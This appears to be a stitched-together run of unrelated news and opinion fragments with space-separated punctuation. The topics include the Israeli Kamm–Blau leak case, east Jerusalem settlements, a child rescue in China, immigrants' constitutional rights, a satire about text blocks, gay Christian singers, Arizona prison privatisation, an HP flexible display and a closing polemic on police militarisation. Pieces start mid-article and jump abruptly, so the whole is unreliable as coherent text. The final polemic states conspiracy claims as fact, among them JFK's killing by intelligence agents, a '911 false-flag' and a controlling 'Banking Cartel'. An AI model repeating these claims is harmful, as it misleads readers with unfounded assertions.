During her conscription , Kamm copied possibly hundreds of army documents that revealed systematic law - breaking by the Israeli high command operating in the occupied Palestinian territories , including orders to ignore court rulings .
She was working at the time in the office of Brig .
Gen. Yair Naveh , who is in charge of operations in the West Bank .
Blau ’s crime is that he published a series of scoops based on her leaked information that have highly embarrassed senior Israeli officers by showing their contempt for the rule of law .
His reports included revelations that the senior command had approved targeting Palestinian bystanders during the military ’s extra-judicial assassinations in the occupied territories ; that , in violation of a commitment to the high court , the army had issued orders to execute wanted Palestinians even if they could be safely apprehended ; and that the defense ministry had a compiled a secret report showing that the great majority of settlements in the West Bank were illegal even under Israeli law ( all are illegal in international law ) .
In a properly democratic country , Kamm would have an honorable defense against the charges , of being a whistle - blower rather than a spy , and Blau would be winning journalism prizes , not huddling away in exile .
But this is Israel .
Here , despite a desperate last - stand for the principles of free speech and the rule of law in the pages of the Haaretz newspaper today , which is itself in the firing line over its role , there is almost no public sympathy for Kamm or even Blau .
The pair are already being described , both by officials and in chat forums and talkback columns , as traitors who should be jailed , disappeared , or executed for the crime of endangering the state .
The telling comparison being made is to Mordechai Vanunu , the former technician at the Dimona nuclear plant who exposed Israel ’s secret nuclear arsenal .
Inside Israel , he is universally reviled to this day , having spent nearly two decades in harsh confinement .
He is still under a loose house arrest , denied the chance to leave the country .
Blau and Kamm have every reason to be worried they may share a similar fate .
Yuval Diskin , the head of the Shin Bet , Israel ’s secret police , which has been leading the investigation , said yesterday that they had been too " sensitive to the media world " in pursuing the case for so long and that the Shin Bet would now " remove its gloves . "
Maybe that explains why Kamm ’s home address was still visible on the charge sheet published yesterday , putting her life in danger from one of those crazed talkbackers .
It certainly echoes warnings we have had before from the Shin Bet about how it operates .
Much like Blau , Azmi Bishara , once head of a leading Arab party in Israel , is today living in exile after the Shin Bet put him in their sights .
He had been campaigning for democratic reforms that would make Israel a " state of all its citizens " rather than a Jewish state .
While he was abroad in 2007 , the Shin Bet announced that he would be put on trial for treason when he returned , supposedly because he had had contacts with Hezbollah during Israel ’s attack on Lebanon in 2006 .
Few experts believe Bishara could have had any useful information for Hezbollah , but the Shin Bet ’s goals and modus operandi were revealed later by Diskin in a letter on its attitude to Bishara and his democratization campaign .
The Shin Bet was there , he said , to thwart the activities of groups or individuals who threatened the state ’s Jewish character " even if such activity is sanctioned by the law . "
Diskin called this the principle of " a democracy defending itself " when it was really a case of Jewish leaders in a state based on Jewish privilege protecting those privileges .
This time it is about the leaders of Israel ’s massive security industry protecting their privileges in a security state by silencing witnesses to their crimes and keeping ordinary citizens in ignorance .
Justifying his decision to " take the gloves off " in the case of Kamm and Blau , Diskin said : " It is a dream of every enemy state to get its hands on these kinds of documents " – that is , documents proving that the Israeli army has repeatedly broken the country ’s laws , in addition , of course , to its systematic violations of international law .
Diskin claims that national security has been put at risk , even though the reports
Blau based on the documents – and even the documents themselves – were presented to , and approved by , the military censor for publication .
The censor can restrict publication based only on national security concerns , unlike Diskin , the army senior command and the government , who obey other kinds of concerns .
Diskin knows there is every chance he will get away with his ploy because of a brainwashed Israeli public , a largely patriotic media and a supine judiciary .
The two judges who oversaw the months of gagging orders to silence any press discussion of this case did so on the say - so of the Shin Bet that there were vital national security issues at stake .
Both judges are stalwarts of Israel ’s enormous security industry .
Einat Ron was appointed a civilian judge in 2007 after working her way up the ranks of the military legal establishment , there to give a legal gloss to the occupation .
Notoriously in 2003 , when she was the chief military prosecutor , she secretly proposed various fabrications to the army so that it could cover up the killing of an 11 - year - old Palestinian boy , Khalil al - Mughrabi , two years earlier .
Her role only came to light because a secret report into the boy ’s death was mistakenly attached to the army ’s letter to an Israeli human rights group .
The other judge is Ze ’ev Hammer , who finally overturned the gag order this week – but only after a former supreme court judge , Dalia Dorner , now the head of Israel ’s Press Council , belatedly heaped scorn on it .
She argued that , with so much discussion of the case outside Israel , the world was getting the impression that Israel flouted democratic norms .
Judge Hammer has his own distinguished place in Israel ’s security industry , according to Israeli analyst Dimi Reider .
During his eight years of legal study , Hammer worked for both the Shin Bet and Israel ’s Mossad spy agency .
Judge Hammer and Judge Ron are deeply implicated in the same criminal outfit – the Israeli security establishment – that is now trying to cover up the tracks that lead directly to its door .
Kamm is doubtless wondering what similar vested interests the judges who hear her case next week will not be declaring .
Writing in Haaretz today , Blau said he had been warned " that if I return to Israel I could be silenced for ever , and that I would be charged for crimes related to espionage . "
He concluded that " this is n’t only a war for my personal freedom but for Israel ’s image . "
He should leave worrying about Israel ’s image to Netanyahu , Diskin , and judges like Dorner .
That was why the gag order was enforced in the first place .
This is not a battle for Israel ’s image ; it ’s a battle for what is left of its soul .
Demons of the Past The Armenian Genocide and the Turks
The month of April marks the 95th anniversary of the start of the Armenian genocide .
An unusual television documentary shows what motivated the murderers and why Germany , and other countries , remained silent .
Israeli prime minister Binyamin Netanyahu has reportedly told the US administration that his government will not stop settlement construction in east Jerusalem , despite US pressure and long - running deadlock in peace talks .
The message was delivered to US officials at the weekend , according to reports by AP and the Wall Street Journal , and comes ahead of a visit to the Middle East by George Mitchell , the US special envoy , later today .
Mark Regev , a spokesman for Netanyahu , would not discuss the details of Israel 's talks with the US administration but he said : " We want this process to succeed and to see the restart of talks .
We hope that this is possible soon . "
Earlier this week Netanyahu insisted again that construction in east Jerusalem would continue .
" The Palestinian demand is that we prevent Jews from building in Jewish neighbourhoods in Jerusalem .
That is an unacceptable demand .
If we made it in London or made it in New York or in Paris , people would cry foul , " he told US television network ABC .
He admitted there were outstanding issues with the US .
" We 're trying to resolve them through diplomatic channels in the best way that we can , " Netanyahu said .
Relations between Israel and the US sank to a new low last month , after a tense meeting between Netanyahu and President Barack Obama in Washington .
Details of their discussion have not emerged , but it appeared Obama wanted Israel to stop building in Jewish settlements in east Jerusalem as a prelude to restarting peace talks with the Palestinians .
The Palestinian leadership says it will not return to talks without a full halt to settlement construction , in line with the US roadmap .
There have not been direct peace negotiations between the two sides since before Israel 's war in Gaza early last year .
Israel claims sovereignty over east Jerusalem , which it captured in the 1967 war and later annexed , and Netanyahu has insisted construction must continue there .
Internationally , east Jerusalem is regarded as under Israeli military occupation and settlement on occupied land is illegal under international law .
The US administration spent much of last year trying to convince Netanyahu to halt all settlement construction .
Netanyahu refused and agreed only to a 10 - month , partial halt to construction in the West Bank - a moratorium which expires this autumn .
Mitchell then spent many months trying to prepare indirect negotiations between Israel and the Palestinians , but a day after an agreement on so - called " proximity talks " was announced , Israeli officials gave approval for 1,600 new homes in an east Jerusalem settlement during a visit by the US vice president , Joe Biden .
Biden condemned the decision and the indirect talks collapsed before they had begun .
Israel has yet to restore its relations with the US and a refusal by Netanyahu to halt east Jerusalem settlement building would only prolong the confrontation .
However , the Wall Street Journal said Netanyahu would offer other incentives instead , including the release of Palestinian prisoners from Israeli jails , the lifting of some checkpoints on the occupied West Bank and allowing some more goods to enter Gaza , despite the long Israeli economic blockade .
Saeb Erekat , the chief Palestinian negotiator , said he hoped Mitchell would bring the right formula to allow indirect talks to start .
Mitchell is expected to hold meetings with Israeli and Palestinian leaders from tomorrow .
Several US officials have emphasised the importance for the US of progress in Israeli - Palestinian peace negotiations .
Jim Jones , the national security adviser , indicated this week that progress in the Middle East would help Washington curb Iranian nuclear ambitions .
" Advancing this peace would ... help prevent Iran from cynically shifting attention away from its failures to meet its obligations , " he said .
Israel has long argued that confronting Iran ought to be an international priority .
But Avigdor Lieberman , the Israeli foreign minister , this week resisted any suggestion that a peace agreement should be imposed on Israel and the Palestinians .
" Any attempt to force a solution on the parties without establishing the foundation of mutual trust will only deepen the conflict , " Lieberman told diplomats in Jerusalem .
A SIX - YEAR - OLD Chinese boy was left dangling by his ears eight storeys above a bustling street after he slipped through window bars outside of his family 's apartment .
Passers - by were stunned when they heard little Ming Ming 's terrified screams and looked up to see him hanging by his head , The Sun reported .
The only thing stopping the lad from plunging to his death was the fact his head was wedged between two window bars .
Horrified neighbours in Yichang , Hubei Province , could only watch as emergency services raced to the scene .
They eventually arrived and managed to use a hydraulic pressure expander to force the bars apart and pulled Ming Ming back into his apartment .
The accident happened after the boy 's grandfather left him sleeping in the flat so he could run an errand outside .
The boy woke up to find himself alone and is believed to have fallen from the window while looking out for his grandfather .
Fire service spokesman Wang Shen said the boy had a miraculous escape : " He could have fallen to the ground - or have been suffocated - at any minute . "
See pictures of Ming Ming 's rescue at The Sun
The fact that the phrase " illegal immigrants , " a term not preferred by the community it denotes , does not appear in the U.S. Constitution does not mean that rights and freedoms do not apply to these individuals .
Often described as a living document , the Constitution is constantly being interpreted and reinterpreted by the U.S. Supreme Court , federal appeals courts , and Congress in order to address the ever - changing needs and demands of the people .
While many argue that " We the People of the United States " refers only to legal citizens , the Supreme Court and lawmakers have consistently disagreed , and for longer than you may think .
Yick Wo v. Hopkins ( 1886 )
In Yick Wo v. Hopkins , a case involving the rights of Chinese immigrants , the Court ruled that the 14th Amendment 's statement , " Nor shall any State deprive any person of life , liberty , or property without due process of law ; nor deny to any person within its jurisdiction the equal protection of the laws , " applied to all persons " without regard to any differences of race , of color , or of nationality " and to " an alien , who has entered the country , and has become subject in all respects to its jurisdiction , and a part of its population , although alleged to be illegally here , " ( Supreme Court of the US 1885 ) .
Wong Wing v. United States ( 1896 )
Citing Yick Wo v. Hopkins , the Court applied the citizenship - blind nature of the Constitution to the 5th and 6th amendments in the case of Wong Wing v. United States , stating " ... it must be concluded that all persons within the territory of the United States are entitled to the protections guaranteed by those amendments and that even aliens shall not be held to answer for a capital or other infamous crime , unless on a presentment or indictment of a grand jury , nor be deprived of life , liberty , or property without due process of law , " ( Supreme Court of the US 1896 ) .
Plyler v. Doe ( 1982 )
In Plyler v. Doe , the Supreme Court struck down a Texas law prohibiting enrollment of illegal aliens — the term most commonly used for undocumented immigrants then — in public schools .
In its decision , the Court concluded , " The illegal aliens who are plaintiffs in these cases challenging the statute may claim the benefit of the Equal Protection Clause , which provides that no State shall ' deny to any person within its jurisdiction the equal protection of the laws . '
Whatever his status under the immigration laws , an alien is a ' person ' in any ordinary sense of that term .
...
The undocumented status of these children vel non does not establish a sufficient rational basis for denying them benefits that the State affords other residents , " ( Supreme Court of the US 1981 ) .
It 's All About Equal Protection
When the Supreme Court decides cases pertaining to First Amendment rights , it typically draws guidance from the 14th Amendment 's principle of " equal protection under the law . "
In essence , the equal protection clause extends First Amendment protection to anyone and everyone covered by the 5th and 14th Amendments .
Through the court 's consistent rulings that the 5th and 14th Amendments apply equally to illegal aliens , such people , therefore , also enjoy First Amendment rights .
In rejecting the argument that the equal protection of the 14th Amendment is limited to U.S. citizens , the Supreme Court has referred to the language used by the Congressional Committee that drafted the amendment :
" The last two clauses of the first section of the amendment disable a State from depriving not merely a citizen of the United States , but any person , whoever he may be , of life , liberty , or property without due process of law , or from denying to him the equal protection of the laws of the State .
This abolishes all class legislation in the States and does away with the injustice of subjecting one caste of persons to a code not applicable to another ... .
It [ the 14th Amendment ] will , if adopted by the States , forever disable every one of them from passing laws trenching upon those fundamental rights and privileges which pertain to citizens of the United States , and to all persons who may happen to be within their jurisdiction , " ( " A Century of Lawmaking for a New Nation : U.S. Congressional Documents and Debates , 1774 - 1875 " ) .
While undocumented workers do not enjoy all of the rights granted to citizens by the Constitution — in particular , the rights to vote or possess firearms — these rights can also be denied to U.S. citizens convicted of felonies .
In final analyses of the ordinances of equal protection , the courts have ruled that , while they are within the borders of the United States , undocumented workers are granted the same fundamental , undeniable constitutional rights as all Americans .
Right to a Lawyer in Deportation Hearings
On June 25 , 2018 , President Donald Trump tweeted that undocumented immigrants should be immediately returned to “ from where they came ” with “ no Judges or Court Cases . ”
This came weeks after the Trump administration issued a “ zero - tolerance ” immigration policy , which led to a spike in separations of undocumented immigrant families detained at the border , ( " Attorney General Announces Zero- Tolerance Policy for Criminal Illegal Entry " ) .
Though President Trump had already ended the family separations through an executive order issued on June 1 , this decision brought heightened attention to the question of whether undocumented immigrants have the right to a court hearing or legal representation , a lawyer , when faced with deportation .
In this case , the Sixth Amendment states , “ In all criminal prosecutions , the accused shall … have the assistance of counsel for his defense . ”
In addition , the U.S. Supreme Court ruled in the 1963 case of Gideon v. Wainwright that if a criminal defendant or suspect lacks enough money to hire an attorney , the government must appoint one to them , ( Supreme Court of the US 1963 ) .
The Trump administration ’s zero - tolerance policy requires that most illegal border crossings , except those involving parents who cross the border illegally with children , be treated as criminal acts .
And according to the Constitution and current law , anyone facing a criminal charge has the right to a lawyer .
However , the government is only required to provide an attorney if the defendant is accused of a felony , and the act of crossing the border illegally is only considered a misdemeanor .
Through this loophole , then , undocumented immigrants are not appointed lawyers .
The Shooting of Kate Steinle by Undocumented Immigrant Jose Ines Garcia Zarate
For a better idea of how undocumented immigrants in the U.S. are afforded constitutional rights , consider the tragic shooting of Kate Steinle .
On July 1 , 2015 , Steinle was killed while visiting a seaside pier in San Francisco by a single bullet fired from a pistol held by Jose Ines Garcia Zarate , an undocumented immigrant .
A citizen of Mexico , Garcia Zarate had been deported several times and had previous convictions for illegally re-entering the U.S. after being deported .
Just before the shooting , he had been released from a San Francisco jail after a minor drug charge against him was dismissed .
While U.S. Immigration and Customs Enforcement issued a detention order for Garcia Zarate , police released him under San Francisco ’s controversial sanctuary city law .
Garcia Zarate was arrested and charged with first - degree murder , second - degree murder , manslaughter , and variety of firearm possession violations .
In his trial , Garcia Zarate claimed that he had found the gun used in the shooting wrapped in a T - shirt under a bench , that it went off accidentally as he unwrapped it , and that he had not intended to shoot anyone .
Prosecutors , however , claimed Garcia Zarate had been seen carelessly pointing the gun at people before the shooting .
On December 1 , 2017 , after lengthy deliberation , the jury acquitted Garcia Zarate on all charges except that of being a felon in possession of a firearm .
Under the constitutional guarantee of due process of law , the jury found reasonable doubt in Garcia Zarate ’s claim that the shooting had been an accident .
In addition , Garcia Zarate ’s criminal record , details of his prior convictions , or immigration status were not allowed to be presented as evidence against him .
In this case and in all similar cases regarding undocumented immigrants , Garcia Zarate , despite being a previously convicted undocumented alien , was afforded the same constitutional rights as those guaranteed to full citizens and lawful immigrant residents of the United States within the criminal justice system . ​
The giant mass of prose was devoid of so much as a large pulled quote for readers to glance at before moving on .
WASHINGTON — Unable to rest their eyes on a colorful photograph or boldface heading that could be easily skimmed and forgotten about , Americans collectively recoiled Monday when confronted with a solid block of uninterrupted text .
Advertisement
Dumbfounded citizens from Maine to California gazed helplessly at the frightening chunk of print , unsure of what to do next .
Without an illustration , chart , or embedded YouTube video to ease them in , millions were frozen in place , terrified by the sight of one long , unbroken string of English words .
" Why wo n't it just tell me what it 's about ? " said Boston resident Charlyne Thomson , who was bombarded with the overwhelming mass of black text late Monday afternoon .
" There are no bullet points , no highlighted parts .
I 've looked everywhere — there 's nothing here but words . "
Advertisement
" Ow , " Thomson added after reading the first and last lines in an attempt to get the gist of whatever the article , review , or possibly recipe was about .
At 3:16 p.m. , a deafening sigh was heard across the country as the nation grappled with the daunting cascade of syllables , whose unfamiliar letter - upon - letter structure stretched on for an endless 500 words .
Children wailed for the attention of their bewildered parents , businesses were shuttered , and local governments ground to a halt as Americans scanned the text in vain for a web link to click on .
Advertisement
Sources also reported a 450 percent rise in temple rubbing and under - the - breath cursing around this time .
" It demands so much of my time and concentration , " said Chicago resident Dale Huza , who was confronted by the confusing mound of words early Monday afternoon .
" This large block of text , it expects me to figure everything out on my own , and I hate it . "
Advertisement
" I 've never seen anything like it , " said Mark Shelton , a high school teacher from St. Paul , MN who stared blankly at the page in front of him for several minutes before finally holding it up to his ear .
" What does it want from us ? "
As the public grows more desperate , scholars are working to randomly italicize different sections of the text , hoping the italics will land on the important parts and allow everyone to go on with their day .
For now , though , millions of panicked and exhausted Americans continue to repetitively search the single column of print from top to bottom and right to left , looking for even the slightest semblance of meaning or perhaps a blurb .
Advertisement
Some have speculated that the never - ending flood of sentences may be a news article , medical study , urgent product recall notice , letter , user agreement , or even a binding contract of some kind .
But until the news does a segment in which they take sections of the text and read them aloud in a slow , calm voice while highlighting those same words on the screen , no one can say for sure .
There are some , however , who remain unfazed by the virtual hailstorm of alternating consonants and vowels , and are determined to ignore it .
Advertisement
" I 'm sure if it 's important enough , they 'll let us know some other way , " Detroit local Janet Landsman said .
" After all , it ca n't be that serious .
If there were anything worthwhile buried deep in that block of impenetrable English , it would at least have an accompanying photo of a celebrity or a large humorous title containing a pop culture reference . "
Added Landsman , " Whatever it is , I 'm pretty sure it does n't even have a point . "
Earlier this month in an interview with Christianity Today , singer / songwriter Jennifer Knapp confirmed what a lot of people in the contemporary Christian music world have suspected since she ascended to popularity a decade ago : she ’s gay .
Since then , Knapp has continued to talk openly about coming out in Christian music , including an appearance on Larry King Live , where she got caught between King and a fundamentalist preacher in what Candace Chellew - Hodge has not unjustly described as an “ immoral debate about homosexuality . ”
That Knapp , as Hodge also notes , held her own in the debacle of a discussion King blunderingly presided over is no surprise , given how deftly she deflected the Christianity Today interviewer ’s repeated attempts to describe her coming out as part of a larger “ struggle with homosexuality . ”
“ It never occurred to me that I was in something that should be labeled as a ‘ struggle , ’ ” Knapp said .
“ The struggle I ’ve had has been with the church acknowledging me as a human being . ”
Knapp ’s response echoed that of another gay Christian singer , the black gospel performer Tonéx , who came out in a television interview last fall .
“ Have you struggled with homosexuality ? ” the interviewer asks Tonéx .
“ Not ‘ struggled , ’ ” Tonéx replies .
“ It was n’t a struggle . ”
More Than Just Friends
It may be difficult for people unfamiliar with evangelical popular culture to understand how and why this kind of thing matters so much .
It ’s not because Tonéx and Knapp are the first gay singers in Christian music .
At least as far back as the 1940s , the gospel guitarist Rosetta Tharpe was , as Gayle Wald has noted in her excellent biography of “ Sister Rosetta , ” rumored to be “ something more than ‘ just friends ’ ” with the performer known as Sister Katty Marie .
More prominently , James Cleveland ’s homosexuality was an open secret for most of his career in the last half of the twentieth century , and the “ King of Gospel ” died in 1991 amidst rumors that he had infected a much younger man with HIV and that he himself had died of AIDS - related complications .
More recently in 2004 , the Southern gospel tenor Kirk Talley was outed after the FBI arrested a man who tried to blackmail Talley with indiscreet photos the singer had posted of himself on a gay chat site .
In 2006 , a photo of the songwriter and gospel music impresario Bill Gaither embracing the lesbian songwriter Marsha Stevens and her partner generated such blowback from Gaither fans that Gaither issued a public statement denouncing homosexuality and lamenting Stevens ’ “ sad ” life as a lesbian .
A few years later in 2008 , the soloist Ray Boltz came out after a long and successful career in CCM and inspirational music ( and a 33 - year straight marriage ) , citing the “ darkness ” of the closet and the torment of living a double life .
And these are only the most famous examples .
Not for nothing has Bishop Yvette Flunder said that gospel music is gay music .
But it ’s not just gospel .
From traditional black and Southern ( or white ) gospel , to praise and worship and inspirational , to Contemporary Christian music , you ca n’t swing a Dove Award ( the Grammies of Christian entertainment ) without hitting upon evidence of the longstanding , deep - set presence of queer experience in , and its influence on , Christian music culture at all levels : from performers on down the line to piano players , back - up singers and other supporting musicians , choir directors and song leaders , songwriters , producers , and managers , and of course , ordinary fans .
Come Out From Among
Them
I have been one of those fans as long as I can remember , growing up as what the playwright Del Shores has called a Southern Baptist Sissy : a deeply - closeted preacher ’s kid who could n’t get enough of gospel music , whether listening to it , singing it , playing it on the piano in church , or performing it on stage with others .
For some time now , the thinking both within and beyond the Christian music world has been that gay guys like me are attracted to the flamboyance and theatricality of Christian entertainment .
Anthony Heilbut was probably the most prominent voice to assert this theory in his landmark history of black gospel in 1971 .
There , he wrote that “ since gospel is theatrical , and theater is the paradigm for much of gay life , gospel has a special allure for gays . ”
More than a few orthodox Christian - music insiders would agree with Heilbut .
Many of them would probably also call for unflagging vigilance , lest the overabundance of homosexuals in Christian entertainment turn the Lord ’s music into Sodom and Gomorrah : The Musical .
Tonéx ’s and Knapp ’s stories stand out in the queer history of Christian music because they directly challenge this heterocentric vision of the misfit gay using the stage to sublimate his forbidden sexual proclivities .
Openly gay and Christian , Tonéx and Knapp insist on the right to “ come out from among them , ” as the apostle Paul put it in his letter to the early church at Corinth , and “ be ye separate , ” in ways that are true to the totality of who they are .
In this way they actively resist being inscribed into evangelicalism ’s punitive discourse of the self - embattled homosexual .
It is tempting to believe we ’re seeing in the likes of Tonéx and Knapp the emergence of a prototypical species of postmodern gay Christian entertainer .
On his popular blog about politics and culture , Andrew Sullivan linked to both Knapp ’s and Tonéx ’s coming - out interviews , particularly highlighting their insistence that being gay is not a personal struggle .
These artists ’ refusal to accept what Sullivan often refers to as the radical “ Christianist ” worldview about homosexuality seems to represent for him the incremental — and inevitable — liberalization of conservative Christian culture in America .
Ex -Gay Gospel
There is undoubtedly some truth to this view , insofar as greater inclusivity for homosexuals in American society at large has allowed the Jennifer Knapps and Tonéxes of the world to live open , honest lives .
But it ’s also easy to confuse the main currents of evangelical popular culture , which overlaps with but remains distinct from mainstream American society , with the cultural climate of America at large .
While the everyday living environment for gays and lesbians in America has improved considerably since Tharpe ’s and Cleveland ’s time , today the resistance within evangelical popular culture toward non-heterosexuals may be , if anything , intensifying in far more overt and punishing ways than in times past .
While Cleveland dominated gospel music for two generations despite the open secret of his homosexuality , the only performers today who have been as widely known to be gay , while also maintaining a career as a Christian performer , are self - described “ ex- gays ” such as the black gospel star Donnie McClurkin .
And McClurkin is among the “ lucky ” ones .
In the much less cosmopolitan world of Southern white gospel , the outed tenor singer Kirk Talley submitted himself to a regime of ex-gay reparative therapy under the supervision of respected industry leaders and prominent pastors .
But music stores still pulled his product from their shelves , his concert schedule became a long list of cancellations , and his music career continues to languish more than six years later ( I ’ve written at greater length about gay men in southern gospel here ) .
Boltz has fared slightly better ( perhaps because he has eschewed the ex-gay path and focused on building a post - gay Christian fan base ) , but I would n’t be surprised if you can find a lot his music deeply discounted in the must - go bin of your local Christian retailer .
The Song Goes On
Even though I eventually came out and left evangelicalism almost half a lifetime ago , I confess there are still times in my work as a scholar of American religious culture ( and a fan of Southern gospel ) when the overwhelming reality of evangelicalism ’s abiding antipathy toward homosexuality becomes so claustrophobic that I want to seize on stories such as Knapp ’s and Tonéx ’s as evidence of a fundamental recalibration in the threshold of tolerance for openly gay people in the world of Christian music .
Yet as much as I ’d like to be right about this , the reality is that the fate of professional Christian musicians who come out is mostly fixed the moment they speak their truth .
Which is why no one I know expects a comeback from Tonéx or Knapp in Christian music .
At some level , they both seem to acknowledge as much , releasing post - coming out crossover albums aimed as much at secular pop , R&B , and hip - hop audiences as Christian music fans .
Understood , then , within the wider contexts of contemporary evangelicalism , these coming - out cases illustrate something less uplifting but more important to any meaningful understanding of religion and American culture : namely , that the more accepting secular society becomes of non-heterosexuals , the more aggressively protective evangelicalism is of its sense of itself as a haven for traditional values and lifeways — not least of all that for them , an absolute prohibition of homosexuality as defining feature of Christianity as they practice it .
Fortunately , the song goes on , as an old Bill Gaither tune puts it .
While the ideological center of evangelical culture may well hold steadfast in its opposition toward homosexuality for some time to come , the critical mass of cultural consensus against gays shrinks ever so slightly every time people like Knapp and Tonéx insist publicly on being true to themselves , without surrendering their stake in Christian music and its concern with the alluring mysteries of the soul ’s striving after grace and salvation .
This , I think , is the true value of the sacred music of American Protestantism : its marvelous , incantatory , ever - dawning capacity to transcend orthodoxy ’s efforts to control what it means or to put limits on the redemptive work it accomplishes for all those who find in it the key for their souls to sing in .
Imagine the apocalypse .
Now imagine characters and elements from ' 80s games carrying it out .
This is exactly what this crazy video portrays , and being a classic games geek myself , if this sort of thing were to happen in real life , I 'm not sure whether I 'd run or marvel at the sight .
It 's all there — Pacman , Tetris , Arkanoid .
Once - friendly , familiar characters wreak havoc on the buildings , streets and cars of New York .
The video was created by Patrick Jean from the Paris - based special effect studio One More Production , and the production level is nothing short of amazing .
See for yourself .
FLORENCE , Ariz . 
One of the newest residents on Arizona ’s death row , a convicted serial killer named Dale Hausner , poked his head up from his television to look at several visitors strolling by , each of whom wore face masks and vests to protect against the sharp homemade objects that often are propelled from the cells of the condemned .
It is a dangerous place to patrol , and Arizona spends $ 4.7 million each year to house inmates like Mr. Hausner in a super - maximum - security prison .
But in a first in the criminal justice world , the state ’s death row inmates could become the responsibility of a private company .
State officials will soon seek bids from private companies for 9 of the state ’s 10 prison complexes that house roughly 40,000 inmates , including the 127 here on death row .
It is the first effort by a state to put its entire prison system under private control .
The privatization effort , both in its breadth and its financial goals , demonstrates what states around the country  broke , desperate and often overburdened with prisoners and their associated costs  are willing to do to balance the books .
Arizona officials hope the effort will put a $ 100 million dent in the state ’s roughly $ 2 billion budget shortfall .
Looks like that flexible plastic display Hewlett - Packard has been talking up since 2008 is finally ready to hit the big time .
According to Carl Taussig , director of information surfaces at HP Labs , the company is developing a wrist PC at the behest of the US military .
Behind the display , a thin strip of metal - coated plastic ( merely 50 microns thick ) is printed with transistors for , you know , displaying stuff .
The thing will be solar powered and , like the display , the solar panels will also be printed , using a technology called Power Film .
With any luck a prototype should be ready within a year .
Now , can we get a PIP Boy already ?
5:56 am
March 22 , 2010
Luke Maurits Adelaide , Australia Admin posts 1483
1 0 Zvan has kindly updated the forum software to its latest version , and this has fixed the bug that has been preventing admins from creating new forums for some time .
Thus , I am happy to introduce : The Project Proposals forum , where people can pitch and discuss ideas for potential future projects .
The Miscellaenous forum , which solves the problem of there being no truly general " catch all " forum for random posts .
The Graphics , animation and film forum , where the creative members of our community can post CSTART - related artwork , animation , etc. for inclusion in official documents etc .
Also where people working on those documents can request artwork that they need from the community .
Happy posting !
Main CLLARE workgroups : Mission Planning , Navigation and Guidance .
I do maths , physics , C , Python and Java .
ppjg corruption human rights violations , militarization of police , police brutality , sodomy of minors , SWAT teams , tasers
J. Speer - Williams ( c ) 2010
____________________
“ To have civilian police departments now using heavy military equipment , automatic weapons , and the tactics , training , and even uniforms of the military , means but one thing : our governmental establishments are setting themselves against us – the people . ”
______________________________________
The halcyon days of relative freedom and tranquility of the fabulous ‘ 50s and early 1960s were abruptly ended with the assassination of President John F. Kennedy , on the 22nd of November , 1963 , by intelligence agents .
Then , the coup de grace was leveled on the American people with the mislabeled “ Patriot Acts , ” after the 911 false - flag .
Ever since then , a police state has been engulfing the “ land of the free and the home of the brave . ”
Former Assistant Secretary of the Treasury in the Reagan administration , Dr. Paul Craig Roberts has told us much about our forming police state , in his great monograph entitled , “ America ’s Police Brutality Pandemic . ”
The endless US “ war on terrorism ” quickly turned into wide spread campaigns to torture innocents , in the Middle East , while rendering millions homeless , amid universal ruin and disease , while over - running America with terrorists , wearing police badges and carrying automatic weapons .
Dr. Roberts wrote , “ Ironically , Bush ’s ‘ war on terror ’ has made Americans less safe at home by diminishing US civil liberty and turning an epidemic of US police brutality into a pandemic …
Americans are not safe anywhere from police . ”
Gratuitous brutality by police invariably ends with an arrest , often based on bogus charges ; and even when videoed , few officers are fired or even disciplined .
Dr. Roberts wrote , “ Cops cover up their own crimes by arresting their victims on false charges that are invented to justify the unprovoked police violence against citizens . ”
From our local city fathers to the US congress to the White House , no one has stepped forward to stop , or even slow , the increasing savagery of police officers across the country .
And even more disturbing is the fact that many Americans still justify police cruelty , no matter how unjustified ; a phenomenon that ’s likely to continue until such rationalizing souls are themselves senselessly beaten by mindless cops , without just cause .
Bullies and those with various inferiority complexes have long been attracted to police , or other kinds of governmental work ; but today , it seems that cruelty – as a personality trait – is a requirement for police work .
Exacerbating the growing specter of police inhumanity has been the militarization of practically every one of the 17,000 police organizations in the country ; it ’s a very troubling development that has gotten worse yearly , since the assassination of President Kennedy .
To have civilian police departments now using heavy military equipment , automatic weapons , and the tactics , training , and even uniforms of the military , means but one thing : our governmental establishments are setting themselves against us – the people .
SWAT ( Special Weapons and Tactics ) teams were virtually unknown in the ‘ 50s and early ‘ 60s ; but today , SWAT teams have become so prevalent , they ’re even used in routine warrant service in drug cases , and other nonviolent crimes , in spite of the fact , that para - military actions often trigger violence instead of defusing it .
University of Eastern Kentucky criminologist Peter Kraska estimates there ’s a frightening 1,500 percent increase in the use of SWAT teams in America , from the early 1980s to the early 2000s .
The use of SWAT teams has reached such proportions , that the America of 2000 has become all but unrecognizable , today .
The corporate media reports few of the over 800 times a week , SWAT teams break into American homes , trash them , shoot any dogs and cats they see , and under the asset forfeiture and seizure laws steal what they want under the pretense of gathering evidence .
Less than one - half of these home invasions result in felony charges .
In fact , many of these SWAT assaults are at wrong addresses , with no redress for stolen property , killed pets or humans .
To “ serve and protect ” no longer seems to be the role of our peace officers ; in deed , today such officers are even labeled as “ law enforcers , ” an enforcement that will be needed to force unpopular laws on the public , laws that do not have the consent of the governed .
Police units in America have become an occupying military force .
Before the militarization of local police departments came the federalization of them , with congressional appropriations , which have not only undermined our Constitution , but have , in effect , nationalized our local police , as federal money always comes with strings attached .
Under our 1878 Posse Comitatus
Act , it became illegal to militarized our civilian police , much less to all but nationalize them .
Our Constitution , and its attendant laws , however , have never curbed the agenda of the International Monetary / Banking Cartel , nor the quick implementation of that plan by the US congress .
In 1981 , congress passed the Military Cooperation with Law Enforcement Official Act , which allowed the US Department of Defense to begin supplying city police departments with heavy military equipment and training , as if the American people were the enemy .
And as if that was not damaging enough , congress again turned against the American people by passing the 1994 Ominibus Crime Act .
Consequently , the federal government took over the complete direction , financing , training , and militarization of our once independent , local police departments , all under the control of “ our ” intelligence agencies .
In a September 7 , 1999 San Francisco Examiner article entitled , “ Paramilitary Cops Serve Themselves Not Us , ” writer Harley Sorensen told us that the Pentagon [ under the direction of intelligence agents ] routinely sends armored personnel carriers , grenade launchers , and M - 16 rifles to city police stations .
Then , President Obama joined the betrayal of the American people with his highly touted and so - called Stimulus Bill ( American Recovery and Reinvestment Act ( ARRA ) that allocated $ 4 billion to buy yet larger gun arsenals of assault rifles and shotguns , and to hire more police , sharpshooters and bomb squads .
The American people paid for ARRA , but as usual , much of that money has been used against them .
Pain compliance has become the byword and goal of the police constabulary , that has been indoctrinated by intelligence services to believe the general public to be their enemies .
Savage police brutality is not new .
Even a score , or so , years ago Human Rights Watch published a report entitled , “ Shield from Justice : Police Brutality and Accountability in the United States . ”
